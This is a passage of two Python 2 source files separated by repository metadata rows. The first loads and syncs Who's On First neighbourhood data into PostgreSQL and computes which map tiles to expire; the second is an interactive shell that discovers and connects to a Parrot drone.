return failure('Missing geometry')
try:
shape_lnglat = shapely.geometry.shape(geometry)
except Exception:
return failure('Unexpected geometry')
shape_mercator = shapely.ops.transform(
reproject_lnglat_to_mercator, shape_lnglat)
# ignore any features that are marked as funky
is_funky = props.get('mz:is_funky')
if is_funky is not None:
try:
is_funky = int(is_funky)
except ValueError:
return failure('Unexpected mz:is_funky value %s' % is_funky)
if is_funky != 0:
return NeighbourhoodFailure(
neighbourhood_meta.wof_id,
'mz:is_funky value is not 0: %s' % is_funky,
json.dumps(json_data), funky=True)
wof_id = props.get('wof:id')
if wof_id is None:
return failure('Missing wof:id')
try:
wof_id = int(wof_id)
except ValueError:
return failure('wof_id is not an int: %s' % wof_id)
name = props.get('wof:name')
if name is None:
return failure('Missing name')
n_photos = props.get('misc:photo_sum')
if n_photos is not None:
try:
n_photos = int(n_photos)
except ValueError:
return failure('misc:photo_sum is not an int: %s' % n_photos)
label_lat = props.get('lbl:latitude')
label_lng = props.get('lbl:longitude')
if label_lat is None or label_lng is None:
# first, try to fall back to geom:* when lbl:* is missing. we'd prefer
# to have lbl:*, but it's better to have _something_ than nothing.
label_lat = props.get('geom:latitude')
label_lng = props.get('geom:longitude')
if label_lat is None or label_lng is None:
return failure('Missing lbl:latitude or lbl:longitude and ' +
'geom:latitude or geom:longitude')
try:
label_lat = float(label_lat)
label_lng = float(label_lng)
except ValueError:
return failure('lbl:latitude or lbl:longitude not float')
label_merc_x, label_merc_y = reproject_lnglat_to_mercator(
label_lng, label_lat)
label_position = shapely.geometry.Point(label_merc_x, label_merc_y)
placetype = props.get('wof:placetype')
if placetype is None:
return failure('Missing wof:placetype')
default_min_zoom = 15
default_max_zoom = 16
min_zoom = props.get('mz:min_zoom')
if min_zoom is None:
min_zoom = default_min_zoom
else:
try:
min_zoom = float(min_zoom)
except ValueError:
return failure('mz:min_zoom not float: %s' % min_zoom)
max_zoom = props.get('mz:max_zoom')
if max_zoom is None:
max_zoom = default_max_zoom
else:
try:
max_zoom = float(max_zoom)
except ValueError:
return failure('mz:max_zoom not float: %s' % max_zoom)
is_landuse_aoi = props.get('mz:is_landuse_aoi')
if is_landuse_aoi is not None:
try:
is_landuse_aoi = int(is_landuse_aoi)
except ValueError:
return failure('is_landuse_aoi not int: %s' % is_landuse_aoi)
is_landuse_aoi = is_landuse_aoi != 0
if shape_mercator.type in ('Polygon', 'MultiPolygon'):
area = int(shape_mercator.area)
else:
area = None
# for the purposes of display, we only care about the times when something
# should first start to be shown, and the time when it should stop
# showing.
edtf_inception = _normalize_edtf(props.get('edtf:inception'))
edtf_cessation = _normalize_edtf(props.get('edtf:cessation'))
edtf_deprecated = _normalize_edtf(props.get('edtf:deprecated'))
# check that the dates are valid first to return back a better error
inception_earliest = edtf_inception.lower_fuzzy()
cessation_latest = edtf_cessation.upper_fuzzy()
deprecated_latest = edtf_deprecated.upper_fuzzy()
if inception_earliest is None:
return failure('invalid edtf:inception: %s' %
props.get('edtf:inception'))
if cessation_latest is None:
return failure('invalid edtf:cessation: %s' %
props.get('edtf:cessation'))
if deprecated_latest is None:
return failure('invalid edtf:deprecated: %s' %
props.get('edtf:deprecated'))
# the 'edtf:inception' property gives us approximately the former and we
# take the earliest date it could mean. the 'edtf:cessation' and
# 'edtf:deprecated' would both stop the item showing, so we take the
# earliest of each's latest possible date.
inception = inception_earliest
cessation = min(cessation_latest, deprecated_latest)
# grab any names in other languages
lang_suffix_size = len('_preferred')
l10n_names = {}
for k, v in props.iteritems():
if not v:
continue
if not k.startswith('name:') or not k.endswith('_preferred'):
continue
if isinstance(v, list):
v = v[0]
lang = k[:-lang_suffix_size]
l10n_names[lang] = v
if not l10n_names:
l10n_names = None
neighbourhood = Neighbourhood(
wof_id, placetype, name, neighbourhood_meta.hash, label_position,
shape_mercator, n_photos, area, min_zoom, max_zoom, is_landuse_aoi,
inception, cessation, l10n_names)
return neighbourhood
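# Fetch one raw GeoJSON record over HTTP. IO errors and non-200 responses are
# returned as halting NeighbourhoodFailure values so the caller can stop
# issuing further requests.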
def fetch_url_raw_neighbourhood(url, neighbourhood_meta, max_retries):
try:
s = _make_requests_session_with_retries(max_retries)
r = s.get(url)
except Exception, e:
# if there is an IO error when fetching the url itself, we'll
# want to halt too
return NeighbourhoodFailure(
neighbourhood_meta.wof_id, 'IO Error fetching %s' % url, str(e),
halt=True)
if r.status_code != 200:
# once we don't get a 200, signal that we should stop all
# remaining processing
return NeighbourhoodFailure(
neighbourhood_meta.wof_id,
'Invalid response %d for %s' % (r.status_code, url), r.text,
halt=True)
try:
doc = r.json()
except Exception, e:
return NeighbourhoodFailure(
neighbourhood_meta.wof_id, 'Response is not json for %s' % url,
r.text)
try:
neighbourhood = create_neighbourhood_from_json(doc, neighbourhood_meta)
except Exception, e:
return NeighbourhoodFailure(
neighbourhood_meta.wof_id,
'Unexpected exception parsing json',
json.dumps(doc))
return neighbourhood
def fetch_fs_raw_neighbourhood(path, neighbourhood_meta):
with open(path) as fp:
json_data = json.load(fp)
neighbourhood = create_neighbourhood_from_json(json_data,
neighbourhood_meta)
return neighbourhood
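# WOF data files are laid out by splitting the numeric id into groups of three
# digits, e.g. (hypothetical id) 85865899 maps to
# <prefix>/858/658/99/85865899.geojson.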
def generate_wof_url(url_prefix, wof_id):
wof_id_str = str(wof_id)
grouped = []
grouping = []
for c in wof_id_str:
grouping.append(c)
if len(grouping) == 3:
grouped.append(grouping)
grouping = []
if grouping:
grouped.append(grouping)
grouped_part = '/'.join([''.join(part) for part in grouped])
wof_url = '%s/%s/%s.geojson' % (url_prefix, grouped_part, wof_id_str)
return wof_url
def make_fetch_raw_url_fn(data_url_prefix, max_retries):
def fn(neighbourhood_meta):
wof_url = generate_wof_url(
data_url_prefix, neighbourhood_meta.wof_id)
neighbourhood = fetch_url_raw_neighbourhood(wof_url,
neighbourhood_meta,
max_retries)
return neighbourhood
return fn
def make_fetch_raw_filesystem_fn(data_path):
def fn(neighbourhood_meta):
# this will work for OS's with / separators
wof_path = generate_wof_url(
data_path, neighbourhood_meta.wof_id)
neighbourhood = fetch_fs_raw_neighbourhood(wof_path,
neighbourhood_meta)
return neighbourhood
return fn
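# Fan the raw fetches out to a small pool of worker threads: each worker pulls
# metas from an input queue until it sees a None sentinel, and a shared Event
# lets a halting failure short-circuit whatever work remains.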
def threaded_fetch(neighbourhood_metas, n_threads, fetch_raw_fn):
queue_size = n_threads * 10
neighbourhood_input_queue = Queue.Queue(queue_size)
neighbourhood_output_queue = Queue.Queue(len(neighbourhood_metas))
stop = threading.Event()
def _fetch_raw_neighbourhood():
while True:
neighbourhood_meta = neighbourhood_input_queue.get()
if neighbourhood_meta is None:
break
if stop.is_set():
# assume all remaining neighbourhoods are failures
# these will get skipped
neighbourhood_output_queue.put(NeighbourhoodFailure(
neighbourhood_meta.wof_id,
'Skipping remaining neighbourhoods',
'Skipping remaining neighbourhoods',
skipped=True))
continue
neighbourhood = fetch_raw_fn(neighbourhood_meta)
if isinstance(neighbourhood, NeighbourhoodFailure):
failure = neighbourhood
# if this is the type of error that should stop all
# processing, notify all other threads
if failure.halt:
stop.set()
neighbourhood_output_queue.put(neighbourhood)
fetch_threads = []
for i in xrange(n_threads):
fetch_thread = threading.Thread(target=_fetch_raw_neighbourhood)
fetch_thread.start()
fetch_threads.append(fetch_thread)
for neighbourhood_meta in neighbourhood_metas:
neighbourhood_input_queue.put(neighbourhood_meta)
for fetch_thread in fetch_threads:
neighbourhood_input_queue.put(None)
neighbourhoods = []
failures = []
for i in xrange(len(neighbourhood_metas)):
neighbourhood = neighbourhood_output_queue.get()
if isinstance(neighbourhood, NeighbourhoodFailure):
failures.append(neighbourhood)
else:
neighbourhoods.append(neighbourhood)
for fetch_thread in fetch_threads:
fetch_thread.join()
return neighbourhoods, failures
class WofUrlNeighbourhoodFetcher(object):
def __init__(self, neighbourhood_url, microhood_url, macrohood_url,
borough_url, data_url_prefix, n_threads, max_retries):
self.neighbourhood_url = neighbourhood_url
self.microhood_url = microhood_url
self.macrohood_url = macrohood_url
self.borough_url = borough_url
self.data_url_prefix = data_url_prefix
self.n_threads = n_threads
self.max_retries = max_retries
def fetch_meta_neighbourhoods(self):
return fetch_wof_url_meta_neighbourhoods(
self.neighbourhood_url, 'neighbourhood', self.max_retries)
def fetch_meta_microhoods(self):
return fetch_wof_url_meta_neighbourhoods(
self.microhood_url, 'microhood', self.max_retries)
def fetch_meta_macrohoods(self):
return fetch_wof_url_meta_neighbourhoods(
self.macrohood_url, 'macrohood', self.max_retries)
def fetch_meta_boroughs(self):
return fetch_wof_url_meta_neighbourhoods(
self.borough_url, 'borough', self.max_retries)
def fetch_raw_neighbourhoods(self, neighbourhood_metas):
url_fetch_fn = make_fetch_raw_url_fn(self.data_url_prefix,
self.max_retries)
neighbourhoods, failures = threaded_fetch(
neighbourhood_metas, self.n_threads, url_fetch_fn)
return neighbourhoods, failures
class WofFilesystemNeighbourhoodFetcher(object):
def __init__(self, wof_data_path, n_threads):
self.wof_data_path = wof_data_path
self.n_threads = n_threads
def _fetch_meta_neighbourhoods(self, placetype):
meta_fs_path = os.path.join(
self.wof_data_path, 'meta', 'wof-%s-latest.csv' % placetype)
with open(meta_fs_path) as fp:
meta_neighbourhoods = list(
parse_neighbourhood_meta_csv(fp, placetype))
return meta_neighbourhoods
def fetch_meta_neighbourhoods(self):
return self._fetch_meta_neighbourhoods('neighbourhood')
def fetch_meta_microhoods(self):
return self._fetch_meta_neighbourhoods('microhood')
def fetch_meta_macrohoods(self):
return self._fetch_meta_neighbourhoods('macrohood')
def fetch_meta_boroughs(self):
return self._fetch_meta_neighbourhoods('borough')
def fetch_raw_neighbourhoods(self, neighbourhood_metas):
data_prefix = os.path.join(
self.wof_data_path, 'data')
fs_fetch_fn = make_fetch_raw_filesystem_fn(data_prefix)
neighbourhoods, failures = threaded_fetch(
neighbourhood_metas, self.n_threads, fs_fetch_fn)
return neighbourhoods, failures
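# Build an in-memory, tab-separated buffer in PostgreSQL COPY format; it is
# consumed below by cursor.copy_from in WofModel.insert_neighbourhoods.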
def create_neighbourhood_file_object(neighbourhoods, curdate=None):
if curdate is None:
curdate = datetime.now().date()
# tell shapely to include the srid when generating WKBs
geos.WKBWriter.defaults['include_srid'] = True
buf = StringIO()
def escape_string(s):
return s.encode('utf-8').replace('\t', ' ').replace('\n', ' ')
def escape_hstore_string(s):
s = escape_string(s)
if ' ' in s:
s = s.replace('"', '\\\\"')
s = '"%s"' % s
return s
def write_nullable_int(buf, x):
if x is None:
buf.write('\\N\t')
else:
buf.write('%d\t' % x)
for n in neighbourhoods:
buf.write('%d\t' % n.wof_id)
buf.write('%d\t' % neighbourhood_placetypes_to_int[n.placetype])
buf.write('%s\t' % escape_string(n.name))
buf.write('%s\t' % escape_string(n.hash))
write_nullable_int(buf, n.n_photos)
write_nullable_int(buf, n.area)
buf.write('%d\t' % n.min_zoom)
buf.write('%d\t' % n.max_zoom)
if n.is_landuse_aoi is None:
buf.write('\\N\t')
else:
buf.write('%s\t' % ('true' if n.is_landuse_aoi else 'false'))
geos.lgeos.GEOSSetSRID(n.label_position._geom, DATABASE_SRID)
buf.write(n.label_position.wkb_hex)
buf.write('\t')
geos.lgeos.GEOSSetSRID(n.geometry._geom, DATABASE_SRID)
buf.write(n.geometry.wkb_hex)
buf.write('\t')
buf.write('%s\t' % n.inception.isoformat())
buf.write('%s\t' % n.cessation.isoformat())
is_visible = n.inception < curdate and n.cessation >= curdate
is_visible_str = 't' if is_visible else 'f'
buf.write('%s\t' % is_visible_str)
if n.l10n_names:
hstore_items = []
for k, v in n.l10n_names.items():
k = escape_hstore_string(k)
v = escape_hstore_string(v)
hstore_items.append("%s=>%s" % (k, v))
hstore_items_str = ','.join(hstore_items)
buf.write('%s' % hstore_items_str)
else:
buf.write('\\N')
buf.write('\n')
buf.seek(0)
return buf
class WofModel(object):
def __init__(self, postgresql_conn_info):
self.postgresql_conn_info = postgresql_conn_info
self.table = 'wof_neighbourhood'
def _create_conn(self):
conn = psycopg2.connect(**self.postgresql_conn_info)
register_hstore(conn)
conn.set_session(autocommit=False)
return conn
def find_previous_neighbourhood_meta(self):
with closing(self._create_conn()) as conn:
with conn.cursor() as cursor:
cursor.execute(
'SELECT wof_id, placetype, name, hash, '
'ST_AsBinary(label_position) '
'FROM %s ORDER BY wof_id ASC' % self.table)
ns = []
for row in cursor:
wof_id, placetype_int, name, hash, label_bytes = row
wof_id = int(wof_id)
label_bytes = bytes(label_bytes)
label_position = shapely.wkb.loads(label_bytes)
placetype = neighbourhood_int_to_placetypes[placetype_int]
n = NeighbourhoodMeta(
wof_id, placetype, name, hash, label_position)
ns.append(n)
return ns
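    # Apply a computed diff to the table: delete removed ids, update changed
    # rows and insert new ones, all inside a single transaction.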
def sync_neighbourhoods(
self, neighbourhoods_to_add, neighbourhoods_to_update,
ids_to_remove):
geos.WKBWriter.defaults['include_srid'] = True
def gen_data(n):
geos.lgeos.GEOSSetSRID(n.label_position._geom, DATABASE_SRID)
geos.lgeos.GEOSSetSRID(n.geometry._geom, DATABASE_SRID)
return dict(
table=self.table,
placetype=neighbourhood_placetypes_to_int[n.placetype],
name=n.name,
hash=n.hash,
n_photos=n.n_photos,
area=n.area,
min_zoom=n.min_zoom,
max_zoom=n.max_zoom,
is_landuse_aoi=n.is_landuse_aoi,
inception=n.inception,
cessation=n.cessation,
label_position=n.label_position.wkb_hex,
geometry=n.geometry.wkb_hex,
wof_id=n.wof_id,
l10n_name=n.l10n_names,
)
if ids_to_remove:
ids_to_remove_str = ', '.join(map(str, ids_to_remove))
if neighbourhoods_to_update:
update_data = map(gen_data, neighbourhoods_to_update)
if neighbourhoods_to_add:
insert_data = map(gen_data, neighbourhoods_to_add)
# this closes the connection
with closing(self._create_conn()) as conn:
# this commits the transaction
with conn as conn:
# this frees any resources associated with the cursor
with conn.cursor() as cursor:
if ids_to_remove:
cursor.execute(
'DELETE FROM %s WHERE wof_id IN (%s)' %
(self.table, ids_to_remove_str))
if neighbourhoods_to_update:
cursor.executemany(
'UPDATE ' + self.table + ' SET '
'placetype=%(placetype)s, '
'name=%(name)s, '
'hash=%(hash)s, '
'n_photos=%(n_photos)s, '
'area=%(area)s, '
'min_zoom=%(min_zoom)s, '
'max_zoom=%(max_zoom)s, '
'is_landuse_aoi=%(is_landuse_aoi)s, '
'inception=%(inception)s, '
'cessation=%(cessation)s, '
'label_position=%(label_position)s, '
'l10n_name=%(l10n_name)s, '
'geometry=%(geometry)s '
'WHERE wof_id=%(wof_id)s',
update_data)
if neighbourhoods_to_add:
cursor.executemany(
'INSERT INTO ' + self.table + ' '
'(wof_id, placetype, name, hash, n_photos, area, '
'min_zoom, max_zoom, is_landuse_aoi, '
'inception, cessation, '
'label_position, geometry, l10n_name) '
'VALUES (%(wof_id)s, %(placetype)s, %(name)s, '
'%(hash)s, %(n_photos)s, %(area)s, %(min_zoom)s, '
'%(max_zoom)s, %(is_landuse_aoi)s, '
'%(inception)s, %(cessation)s, '
'%(label_position)s, %(geometry)s, %(l10n_name)s)',
insert_data)
def insert_neighbourhoods(self, neighbourhoods):
# create this whole input file like object outside of the transaction
nf = create_neighbourhood_file_object(neighbourhoods)
# close the connection
with closing(self._create_conn()) as conn:
# commit the transaction
with conn as conn:
with conn.cursor() as cursor:
cursor.copy_from(nf, self.table)
# update the whole table so that the `is_visible` flag is accurate for the
# `current_date`. this returns a list of coords at `zoom` which have
# changed visibility from true to false or vice-versa.
def update_visible_timestamp(self, zoom, current_date):
coords = set()
def coord_int(row):
x, y = row
return coord_int_at_mercator_point(zoom, x, y)
# close the connection
with closing(self._create_conn()) as conn:
# commit the transaction
with conn as conn:
with conn.cursor() as cursor:
# select the x, y position of the label for each WOF
# neighbourhood that changed visibility when the date
# was updated to `current_date`.
cursor.execute(
'SELECT st_x(n.label_position) as x, '
' st_y(n.label_position) as y '
'FROM ('
' SELECT wof_update_visible_ids(%s::date) AS id '
') u '
'JOIN wof_neighbourhood n '
'ON n.wof_id = u.id',
(current_date.isoformat(),))
for result in cursor:
coords.add(coord_int(result))
return coords
def diff_neighbourhoods(xs, ys):
# NOTE this requires that both xs and ys be sequences of
# neighbourhoods, sorted by wof_id in ascending order
# returns a sequence of tuples:
# (None, x) -> neighbourhoods that have been added
# (x, None) -> neighbourhoods that have been removed
# (x, y) -> neighbourhoods that have been updated
diffs = []
n_xs = len(xs)
n_ys = len(ys)
idx_xs = 0
idx_ys = 0
# iterate through both lists while we still have values for both
while idx_xs < n_xs and idx_ys < n_ys:
x = xs[idx_xs]
y = ys[idx_ys]
if x.wof_id < y.wof_id:
diffs.append((x, None))
idx_xs += 1
continue
if y.wof_id < x.wof_id:
diffs.append((None, y))
idx_ys += 1
continue
if x.hash != y.hash:
# if there are any differences the hash will be different
diffs.append((x, y))
idx_xs += 1
idx_ys += 1
# any leftovers in xs are removals, any leftovers in ys are additions
while idx_xs < n_xs:
x = xs[idx_xs]
diffs.append((x, None))
idx_xs += 1
while idx_ys < n_ys:
y = ys[idx_ys]
diffs.append((None, y))
idx_ys += 1
return diffs
def coord_int_at_mercator_point(z, x, y):
coord = mercator_point_to_coord(z, x, y)
coord_int = coord_marshall_int(coord)
return coord_int
def generate_tile_expiry_list(zoom, diffs):
coord_ints = set()
def add_neighbourhood_diff(n):
if n is not None:
x = n.label_position.x
y = n.label_position.y
coord_int = coord_int_at_mercator_point(zoom, x, y)
coord_ints.add(coord_int)
for n1, n2 in diffs:
# for our purposes, we will expire any kind of modification,
# whether the neighbourhoods were added, removed, or updated
add_neighbourhood_diff(n1)
add_neighbourhood_diff(n2)
return coord_ints
def log_failure(logger, failure):
if not (failure.skipped or failure.funky or failure.superseded):
failure_message_one_line = failure.message.replace('\n', ' | ')
logger.error('Neighbourhood failure for %d: %r - %r' % (
failure.wof_id, failure.reason, failure_message_one_line))
class WofProcessor(object):
def __init__(self, fetcher, model, redis_cache_index, intersector,
rawr_enqueuer, logger, current_date):
self.fetcher = fetcher
self.model = model
self.redis_cache_index = redis_cache_index
self.intersector = intersector
self.rawr_enqueuer = rawr_enqueuer
self.logger = logger
self.zoom_expiry = 16
self.zoom_until = 11
self.current_date = current_date
def __call__(self):
# perform IO to get old/new neighbourhoods and tiles of
# interest in parallel
# queues to pass the results through the threads
prev_neighbourhoods_queue = Queue.Queue(1)
meta_neighbourhoods_queue = Queue.Queue(1)
meta_microhoods_queue = Queue.Queue(1)
meta_macrohoods_queue = Queue.Queue(1)
meta_boroughs_queue = Queue.Queue(1)
toi_queue = Queue.Queue(1)
# functions for the threads
def find_prev_neighbourhoods():
prev_neighbourhoods = (
self.model.find_previous_neighbourhood_meta())
prev_neighbourhoods_queue.put(prev_neighbourhoods)
def make_fetch_meta_csv_fn(fn, queue):
neighbourhood_metas = list(fn())
queue.put(neighbourhood_metas)
def fetch_toi():
toi = self.redis_cache_index.fetch_tiles_of_interest()
toi_queue.put(toi)
self.logger.info('Fetching tiles of interest in background ...')
self.logger.info('Fetching old and new neighbourhoods ...')
# start the threads in parallel
prev_neighbourhoods_thread = threading.Thread(
target=find_prev_neighbourhoods)
prev_neighbourhoods_thread.start()
meta_neighbourhoods_thread = threading.Thread(
target=make_fetch_meta_csv_fn(
self.fetcher.fetch_meta_neighbourhoods,
meta_neighbourhoods_queue))
meta_neighbourhoods_thread.start()
meta_microhoods_thread = threading.Thread(
target=make_fetch_meta_csv_fn(
self.fetcher.fetch_meta_microhoods,
meta_microhoods_queue))
meta_microhoods_thread.start()
meta_macrohoods_thread = threading.Thread(
target=make_fetch_meta_csv_fn(
self.fetcher.fetch_meta_macrohoods,
meta_macrohoods_queue))
meta_macrohoods_thread.start()
meta_boroughs_thread = threading.Thread(
target=make_fetch_meta_csv_fn(
self.fetcher.fetch_meta_boroughs,
meta_boroughs_queue))
meta_boroughs_thread.start()
toi_thread = threading.Thread(target=fetch_toi)
toi_thread.start()
# ensure we're done with finding the next and previous
# neighbourhoods by this point
prev_neighbourhoods_thread.join()
meta_neighbourhoods_thread.join()
meta_microhoods_thread.join()
meta_macrohoods_thread.join()
meta_boroughs_thread.join()
self.logger.info('Fetching old and new neighbourhoods ... done')
prev_neighbourhoods = prev_neighbourhoods_queue.get()
meta_neighbourhoods = meta_neighbourhoods_queue.get()
meta_microhoods = meta_microhoods_queue.get()
meta_macrohoods = meta_macrohoods_queue.get()
meta_boroughs = meta_boroughs_queue.get()
# each of these has the appropriate placetype set now
meta_neighbourhoods = (
meta_neighbourhoods + meta_microhoods + meta_macrohoods +
meta_boroughs)
self.logger.info('Diffing neighbourhoods ...')
by_neighborhood_id = attrgetter('wof_id')
# the model is expected to return records in ascending order by id
# it doesn't seem like the neighbourhoods in the wof csv
# are in ascending order, so we sort explicitly here
meta_neighbourhoods.sort(key=by_neighborhood_id)
# the diff algorithm depends on the neighbourhood lists
# being in sorted order by id
diffs = diff_neighbourhoods(prev_neighbourhoods,
meta_neighbourhoods)
self.logger.info('Diffing neighbourhoods ... done')
# we need to fetch neighbourhoods that have either been
# updated or are new
wof_neighbourhoods_to_fetch = []
# based on the diff, we'll need to keep track of how we'll
# need to update
ids_to_add = set()
ids_to_update = set()
ids_to_remove = set()
for dx, dy in diffs:
if dy is not None:
if dx is None:
ids_to_add.add(dy.wof_id)
else:
ids_to_update.add(dy.wof_id)
wof_neighbourhoods_to_fetch.append(dy)
else:
ids_to_remove.add(dx.wof_id)
if wof_neighbourhoods_to_fetch:
self.logger.info('Fetching %d raw neighbourhoods ...' %
len(wof_neighbourhoods_to_fetch))
raw_neighbourhoods, failures = (
self.fetcher.fetch_raw_neighbourhoods(
wof_neighbourhoods_to_fetch))
self.logger.info('Fetching %d raw neighbourhoods ... done' %
len(wof_neighbourhoods_to_fetch))
else:
self.logger.info('No raw neighbourhoods found to fetch')
raw_neighbourhoods = ()
failures = []
# remove any failed neighbourhoods from the add/update lists
# also keep track of these ids to remove from the diffs too
failed_wof_ids = set()
superseded_by_wof_ids = set()
funky_wof_ids = set()
for failure in failures:
failure_wof_id = failure.wof_id
log_failure(self.logger, failure)
if failure.funky:
# this scenario is triggered for new neighbourhoods,
# or if a neighbourhood became funky
# both scenarios are handled by the checks further down;
# for now we just track the ids of the funky
# neighbourhoods
funky_wof_ids.add(failure_wof_id)
if failure.superseded:
self.logger.warn(
'superseded_by inconsistency for %s' % failure_wof_id)
# this means that we had a value for superseded_by in
# the raw json, but not in the meta file
# this should get treated as a removal
superseded_by_wof_ids.add(failure_wof_id)
failed_wof_ids.add(failure_wof_id)
ids_to_add.discard(failure_wof_id)
ids_to_update.discard(failure_wof_id)
# we'll only log the number of funky records that we found
if funky_wof_ids:
self.logger.warn('Number of funky neighbourhoods: %d' %
len(funky_wof_ids))
# now we'll want to ensure that the failed ids are not present
# in any additions or updates
new_diffs = []
for n1, n2 in diffs:
if n2 is None or n2.wof_id not in failed_wof_ids:
new_diffs.append((n1, n2))
diffs = new_diffs
# and we'll want to also treat any superseded_by
# inconsistencies as removals
# but we need the original neighbourhood meta object to
# generate the diff, for its label position to expire the
# appropriate tile
if superseded_by_wof_ids:
for n in prev_neighbourhoods:
if n.wof_id in superseded_by_wof_ids:
ids_to_remove.add(n.wof_id)
diffs.append((n, None))
# if the neighbourhood became funky and we had it in our
# existing set, we'll want to remove it
if funky_wof_ids:
for n in prev_neighbourhoods:
if n.wof_id in funky_wof_ids:
ids_to_remove.add(n.wof_id)
diffs.append((n, None))
sync_neighbourhoods_thread = None
if diffs:
self.logger.info("Sync'ing neighbourhoods ...")
# raw_neighbourhoods contains both the neighbourhoods to
# add and update
# we split it up here
neighbourhoods_to_update = []
neighbourhoods_to_add = []
for neighbourhood in raw_neighbourhoods:
if neighbourhood.wof_id in ids_to_add:
neighbourhoods_to_add.append(neighbourhood)
elif neighbourhood.wof_id in ids_to_update:
neighbourhoods_to_update.append(neighbourhood)
else:
assert 0, '%d should have been found to add or update' % (
neighbourhood.wof_id)
if neighbourhoods_to_add:
self.logger.info('Inserting neighbourhoods: %d' %
len(neighbourhoods_to_add))
if neighbourhoods_to_update:
self.logger.info('Updating neighbourhoods: %d' %
len(neighbourhoods_to_update))
if ids_to_remove:
self.logger.info('Removing neighbourhoods: %d' %
len(ids_to_remove))
def _sync_neighbourhoods():
self.model.sync_neighbourhoods(
neighbourhoods_to_add, neighbourhoods_to_update,
ids_to_remove)
sync_neighbourhoods_thread = threading.Thread(
target=_sync_neighbourhoods)
sync_neighbourhoods_thread.start()
else:
self.logger.info('No diffs found, no sync necessary')
if diffs:
self.logger.info('Generating tile expiry list ...')
expired_coord_ints = generate_tile_expiry_list(
self.zoom_expiry, diffs)
self.logger.info(
'Generating tile expiry list ... done - '
'Found %d expired tiles' % len(expired_coord_ints))
else:
self.logger.info('No diffs found, not generating expired coords')
expired_coord_ints = set()
# ensure we're done fetching the tiles of interest by this point
toi_thread.join()
toi = toi_queue.get()
self.logger.info('Have tiles of interest')
# we need to finish sync'ing neighbourhoods before we flip the
# visibility flag and enqueue coordinates
if sync_neighbourhoods_thread is not None:
sync_neighbourhoods_thread.join()
self.logger.info("Sync'ing neighbourhoods ... done")
# update the current timestamp, returning the list of coords that
# have changed visibility.
visibility_updates = \
self.model.update_visible_timestamp(
self.zoom_expiry, self.current_date)
self.logger.info('Have %d tile expiries from visibility changes.'
% len(visibility_updates))
expired_coord_ints.update(visibility_updates)
if diffs:
# intersect the tiles of interest with the expired coords from
# the neighbourhood diff
self.logger.info('Intersecting %d tiles of interest with %d '
'expired tiles' % (
len(toi), len(expired_coord_ints)))
toi_expired_coord_ints, _ = self.intersector(
expired_coord_ints, toi, self.zoom_until)
coords = map(coord_unmarshall_int, toi_expired_coord_ints)
self.logger.info('Intersection complete, will expire %d tiles' %
len(coords))
else:
self.logger.info('No diffs found, no need to intersect')
coords = ()
if coords:
self.logger.info('Asking enqueuer to enqueue %d coords ...' %
len(coords))
self.rawr_enqueuer(coords)
self.logger.info('Asking enqueuer to enqueue %d coords ... done' %
len(coords))
else:
self.logger.info('No expired tiles to enqueue')
class WofInitialLoader(object):
def __init__(self, fetcher, model, logger):
self.fetcher = fetcher
self.model = model
self.logger = logger
def __call__(self):
self.logger.info('Fetching meta neighbourhoods csv ...')
neighbourhood_metas = list(self.fetcher.fetch_meta_neighbourhoods())
self.logger.info('Fetching meta neighbourhoods csv ... done')
self.logger.info('Fetching meta microhoods csv ...')
microhood_metas = list(self.fetcher.fetch_meta_microhoods())
self.logger.info('Fetching meta microhoods csv ... done')
self.logger.info('Fetching meta macrohoods csv ...')
macrohood_metas = list(self.fetcher.fetch_meta_macrohoods())
self.logger.info('Fetching meta macrohoods csv ... done')
self.logger.info('Fetching meta boroughs csv ...')
borough_metas = list(self.fetcher.fetch_meta_boroughs())
self.logger.info('Fetching meta boroughs csv ... done')
neighbourhood_metas = (
neighbourhood_metas + microhood_metas + macrohood_metas +
borough_metas)
self.logger.info('Fetching raw neighbourhoods ...')
neighbourhoods, failures = self.fetcher.fetch_raw_neighbourhoods(
neighbourhood_metas)
for failure in failures:
log_failure(self.logger, failure)
self.logger.info('Fetching raw neighbourhoods ... done')
self.logger.info('Inserting %d neighbourhoods ...' %
len(neighbourhoods))
self.model.insert_neighbourhoods(neighbourhoods)
self.logger.info('Inserting %d neighbourhoods ... done' %
len(neighbourhoods))
def make_wof_url_neighbourhood_fetcher(
neighbourhood_url, microhood_url, macrohood_url, borough_url,
data_prefix_url, n_threads, max_retries):
fetcher = WofUrlNeighbourhoodFetcher(
neighbourhood_url, microhood_url, macrohood_url, borough_url,
data_prefix_url, n_threads, max_retries)
return fetcher
def make_wof_filesystem_neighbourhood_fetcher(wof_data_path, n_threads):
fetcher = WofFilesystemNeighbourhoodFetcher(
wof_data_path, n_threads)
return fetcher
def make_wof_model(postgresql_conn_info):
wof_model = WofModel(postgresql_conn_info)
return wof_model
def make_wof_processor(
fetcher, model, redis_cache_index, rawr_enqueuer, logger,
current_date):
from tilequeue.command import explode_and_intersect
wof_processor = WofProcessor(
fetcher, model, redis_cache_index, explode_and_intersect,
rawr_enqueuer, logger, current_date)
return wof_processor
def make_wof_initial_loader(fetcher, model, logger):
wof_loader = WofInitialLoader(fetcher, model, logger)
return wof_loader
|
mit
| 9,120,416,503,911,111,000
| 35.280757
| 79
| 0.582449
| false
| 3.652271
| false
| false
| false
|
Tala/bybop
|
src/interactive.py
|
1
|
1944
|
#!/usr/bin/env python
import sys
try:
import readline
except ImportError:
import pyreadline as readline
import os
import code
import rlcompleter
lib_path = os.path.abspath(os.path.join('..', 'src'))
sys.path.append(lib_path)
lib_path = os.path.abspath(os.path.join('..', '..', 'ARSDKBuildUtils', 'Utils', 'Python'))
sys.path.append(lib_path)
from Bybop_Discovery import *
import Bybop_Device
print('Searching for devices')
from zeroconf import ZeroconfServiceTypes
print('\n'.join(ZeroconfServiceTypes.find()))
print('done.')
discovery = Discovery([DeviceID.BEBOP_DRONE, DeviceID.JUMPING_SUMO, DeviceID.AIRBORNE_NIGHT, DeviceID.JUMPING_NIGHT])
discovery.wait_for_change()
devices = discovery.get_devices()
#discovery.stop()
if not devices:
print('No devices found.')
sys.exit(1)
device = devices.itervalues().next()
print('Will connect to ' + get_name(device))
d2c_port = 43210
controller_type = "PC"
controller_name = "bybop shell"
drone = Bybop_Device.create_and_connect(device, d2c_port, controller_type, controller_name)
if drone is None:
print('Unable to connect to a product')
sys.exit(1)
drone.dump_state()
vars = globals().copy()
vars.update(locals())
readline.set_completer(rlcompleter.Completer(vars).complete)
readline.parse_and_bind("tab: complete")
shell = code.InteractiveConsole(vars)
# drone.jump(0) # jump forward
# drone.jump(1) # jump up
# drone.move_forward(20) # move forwards
# drone.move_forward(-20) # move backwards
# drone.move(0,50) # turn right?
